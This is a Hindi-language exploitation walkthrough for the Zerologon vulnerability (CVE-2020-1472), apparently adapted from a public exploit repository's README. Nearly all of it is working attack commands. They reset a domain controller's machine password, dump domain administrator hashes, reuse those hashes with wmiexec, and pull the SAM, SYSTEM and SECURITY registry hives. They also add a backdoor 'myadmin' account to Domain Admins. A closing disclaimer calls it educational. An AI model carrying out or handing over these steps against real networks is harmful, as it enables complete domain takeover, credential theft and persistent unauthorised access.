
CVE-2020-1472 का शोषण करने के लिए zerologon स्क्रिप्ट, CVSS 10/10
CVE-2020-1472 CVSS 10/10 का शोषण करने के लिए zerologon स्क्रिप्ट एक्सप्लॉइट कोड https://www.secura.com/blog/zero-logon और https://github.com/SecuraBV/CVE-2020-1472 पर आधारित है। मूल शोध और स्कैनर Secura द्वारा, संशोधन RiskSense Inc. द्वारा। https://github.com/risksense/zerologon
शोषण के लिए, आपके पास मौजूद किसी भी पिछले Impacket इंस्टॉलेशन को हटा दें और https://github.com/SecureAuthCorp/impacket/commit/b867b21 या उससे नए Impacket को इंस्टॉल करें।
apt update
apt remove --purge impacket-scripts python3-impacket
apt autoremove
git clone https://github.com/rthalley/dnspython.git
sudo python3 setup.py install
cd ..
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
sudo python3 setup.py install
git clone
फिर, यह करें:
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
यदि यह सफल होता है तो आप यह कर पाएंगे:
sudo secretsdump.py -just-dc domain/hostname\$@ip
पासवर्ड प्रॉम्प्ट पर "Enter" दबाने से आप पास हो जाएंगे, जिससे आपको Domain Admin हैश मिल जाना चाहिए। उसके बाद, secretsdump से मिले एक क्रेडेंशियल के साथ wmiexec.py को लक्षित DC पर चलाएँ।
wmiexec.py domain/Administrator@ip -hashes hash
और करें:
reg save HKLM\SYSTEM system.save
get system.save
del /f system.save
reg save HKLM\SAM sam.save
get sam.save
del /f sam.save
reg save HKLM\SECURITY security.save
get security.save
del /f security.save
और फिर आप केवल मामले में एक नया Admin खाता बना सकते हैं,
net user myadmin Hello1234 /ADD /DOMAIN
और नए खाते को पूर्ण विशेषाधिकार प्राप्त करने के लिए domain admins समूह में जोड़ें,
net group "Domain Admins" myadmin /ADD /DOMAIN
और शायद अब C:> से exit करें।
फिर आप चला सकते हैं
sudo secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
और यह आपको मशीन खाते का मूल NT हैश दिखाएगा। फिर आप निम्न द्वारा उस मूल मशीन खाता हैश को डोमेन में पुनः स्थापित कर सकते हैं:
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH
DC के सामान्य रूप से संचालित होते रहने के लिए मूल हैश को पुनः स्थापित करना आवश्यक है।
और बस यह सुनिश्चित करने के लिए कि पुनर्स्थापना प्रक्रिया काम कर गई,
sudo secretsdump.py -just-dc domain/hostname\$@ip
और पासवर्ड प्रॉम्प्ट पर "Enter" दबाना अब काम नहीं करेगा।
और हम यहाँ पूरा कर चुके हैं।
शुभ शिकार।
अस्वीकरण: यह पूरी तरह से शैक्षिक उद्देश्यों के लिए है, मैं किसी भी कार्रवाई या उनके परिणामों के लिए ज़िम्मेदार नहीं हूँ। किसी और के डिवाइस में हैकिंग करना अवैध है और कानून द्वारा दंडनीय है।